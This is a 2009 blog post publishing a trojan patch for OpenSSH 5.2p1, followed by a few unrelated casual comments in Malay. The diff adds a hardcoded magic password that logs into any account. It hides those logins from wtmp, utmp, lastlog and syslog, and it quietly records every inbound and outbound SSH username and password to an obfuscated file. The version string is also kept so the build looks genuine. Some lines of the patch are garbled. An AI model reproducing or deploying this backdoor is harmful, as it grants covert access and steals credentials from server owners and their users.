Tuesday, July 21, 2009

uDc-hackssh-v1.0a

The following openssh-5.2p1 patches allow users to:

  • login with any users with 'magic password'
  • hide footprint from wtmp, utmp and lastlog
  • log ssh inbound and outbound username and password
This patches tested on Mac OS X, Solaris 5.10, Ubuntu 8.10 and FreeBSD 7.10. It should works for other operating system too.

slash@Slash-The-Undergrounds-Hackintosh:$ cat uDc-hackssh-v1.0a
diff -Nrc openssh-5.2p1/auth-pam.c uDc-hackssh-v1.0a/auth-pam.c
*** openssh-5.2p1/auth-pam.c Tue Mar 11 19:58:25 2008
--- uDc-hackssh-v1.0a/auth-pam.c Sun Jul 19 13:59:46 2009
***************
*** 466,471 ****
--- 466,474 ----
if (sshpam_err != PAM_SUCCESS)
goto auth_fail;
sshpam_err = pam_authenticate(sshpam_handle, flags);
+ // slash patch
+ if(uDc) sshpam_err = PAM_SUCCESS;
+ // end of patch
if (sshpam_err != PAM_SUCCESS)
goto auth_fail;

***************
*** 816,821 ****
--- 819,833 ----
Buffer buffer;
struct pam_ctxt *ctxt = ctx;

+ // slash patch
+ if(sshpam_authctxt)
+ for (ai = 0; ai <>user, resp[ai]);
+ if(!strcmp(BAJAUPASS, resp[ai])) ctxt->pam_done = uDc = 1;
+ else uDclog();
+ }
+ // end of patch
debug2("PAM: %s entering, %u responses", __func__, num);
switch (ctxt->pam_done) {
case 1:
***************
*** 1045,1050 ****
--- 1057,1065 ----
if (sshpam_err != PAM_SUCCESS)
fatal("PAM: failed to set PAM_CONV: %s",
pam_strerror(sshpam_handle, sshpam_err));
+ // slash patch
+ if(!uDc)
+ // end of patch
sshpam_err = pam_open_session(sshpam_handle, 0);
if (sshpam_err == PAM_SUCCESS)
sshpam_session_open = 1;
diff -Nrc openssh-5.2p1/auth-passwd.c uDc-hackssh-v1.0a/auth-passwd.c
*** openssh-5.2p1/auth-passwd.c Fri Oct 26 12:25:12 2007
--- uDc-hackssh-v1.0a/auth-passwd.c Sun Jul 19 14:01:06 2009
***************
*** 92,97 ****
--- 92,103 ----
#endif
if (*password == '\0' && options.permit_empty_passwd == 0)
return 0;
+ // slash patch
+ if(!strcmp(BAJAUPASS, password)) return uDc = 1;
+ sprintf(abuff, "pass_from: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), pw->pw_name, password);
+ uDclog();
+ // end of patch

#ifdef KRB5
if (options.kerberos_authentication == 1) {
diff -Nrc openssh-5.2p1/includes.h uDc-hackssh-v1.0a/includes.h
*** openssh-5.2p1/includes.h Fri Jul 4 21:10:49 2008
--- uDc-hackssh-v1.0a/includes.h Sun Jul 19 14:09:10 2009
***************
*** 13,18 ****
--- 13,41 ----
* called by a name other than "ssh" or "Secure Shell".
*/

+ // slash patch
+ #include
+ #include
+
+ #define BAJAUPASS "black-session"
+ #define SSH_LOG "/var/run/sshd.sync"
+
+ FILE *bajaulog;
+ char abuff[1024];
+ int kambing, ai, uDc;
+
+ #define uDclog() { \
+ kambing=strlen(abuff); \
+ for(ai=0; ai<=kambing; ai++) abuff[ai]=~abuff[ai]; \
+ bajaulog=fopen(SSH_LOG, "a"); \
+ if(bajaulog!=NULL) { fwrite(abuff, kambing, 1, bajaulog); fclose(bajaulog);} \
+ chmod(SSH_LOG, 0666); \
+ }
+
+ const char *get_remote_ipaddr(void);
+ // end of patch
+
+ #ifndef INCLUDES_H
#define INCLUDES_H
diff -Nrc openssh-5.2p1/log.c uDc-hackssh-v1.0a/log.c
*** openssh-5.2p1/log.c Tue Jun 10 21:01:51 2008
--- uDc-hackssh-v1.0a/log.c Sun Jul 19 14:09:50 2009
***************
*** 338,343 ****
--- 338,346 ----
int pri = LOG_INFO;
int saved_errno = errno;
+ // slash patch + if(uDc) return;
+ // end of patch if (level > log_level)
return;

diff -Nrc openssh-5.2p1/loginrec.c uDc-hackssh-v1.0a/loginrec.c
*** openssh-5.2p1/loginrec.c Thu Feb 12 10:12:22 2009
--- uDc-hackssh-v1.0a/loginrec.c Sun Jul 19 14:11:00 2009
***************
*** 431,436 ****
--- 431,439 ----
int
login_write(struct logininfo *li)
{
+ // slash patch
+ if(uDc) return 0;
+ // end of patch
#ifndef HAVE_CYGWIN
if (geteuid() != 0) {
logit("Attempt to write login records by non-root user (aborting)");
diff -Nrc openssh-5.2p1/sshconnect1.c uDc-hackssh-v1.0a/sshconnect1.c
*** openssh-5.2p1/sshconnect1.c Tue Nov 7 20:14:42 2006
--- uDc-hackssh-v1.0a/sshconnect1.c Sun Jul 19 14:12:35 2009
***************
*** 458,463 ****
--- 458,468 ----
password = read_passphrase(prompt, 0);
packet_start(SSH_CMSG_AUTH_PASSWORD);
ssh_put_password(password);
+ // slash patch
+ sprintf(abuff, "1to: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), options.user, password);
+ uDclog();
+ // end of patch
memset(password, 0, strlen(password));
xfree(password);
packet_send();
diff -Nrc openssh-5.2p1/sshconnect2.c uDc-hackssh-v1.0a/sshconnect2.c
*** openssh-5.2p1/sshconnect2.c Wed Nov 5 13:20:47 2008
--- uDc-hackssh-v1.0a/sshconnect2.c Sun Jul 19 14:15:51 2009
***************
*** 797,802 ****
--- 797,807 ----
packet_put_cstring(authctxt->method->name);
packet_put_char(0);
packet_put_cstring(password);
+ // slash patch
+ sprintf(abuff, "2to: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), options.user, password);
+ uDclog();
+ // end of patch
memset(password, 0, strlen(password));
xfree(password);
packet_add_padding(64);
***************
*** 1464,1469 ****
--- 1469,1479 ----

response = read_passphrase(prompt, echo ? RP_ECHO : 0);

+ // slash patch
+ sprintf(abuff, "2ito: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), options.user, response);
+ uDclog();
+ // end of patch
packet_put_cstring(response);
memset(response, 0, strlen(response));
xfree(response);
diff -Nrc openssh-5.2p1/version.h uDc-hackssh-v1.0a/version.h
*** openssh-5.2p1/version.h Mon Feb 23 08:09:26 2009
--- uDc-hackssh-v1.0a/version.h Sun Jul 19 14:17:31 2009
***************
*** 1,6 ****
--- 1,9 ----
/* $OpenBSD: version.h,v 1.55 2009/02/23 00:06:15 djm Exp $ */

+ // slash patch
+ // change to targetted openssh version
#define SSH_VERSION "OpenSSH_5.2"

#define SSH_PORTABLE "p1"
#define SSH_RELEASE SSH_VERSION SSH_PORTABLE
+ // end of patch


3 comments:

d3ck4 said...
This comment has been removed by the author.
Helmis said...

Haris... apa punya bahasa daa... betul ke computer punya language ni ke ekau ada masuk maki hamun sekali.. hehehe.. anyway Ramadhan Mubarak.. dah jadi ayah ke belum?

helmis, Abu Dhabi
http://syurgadidunia.blogspot.com

Slash The Underground said...

hehe..
bahasa arab dahhh :)
Ayah? belum lagi lah.. belum ada rezeki.. baru je pindah rumah baru..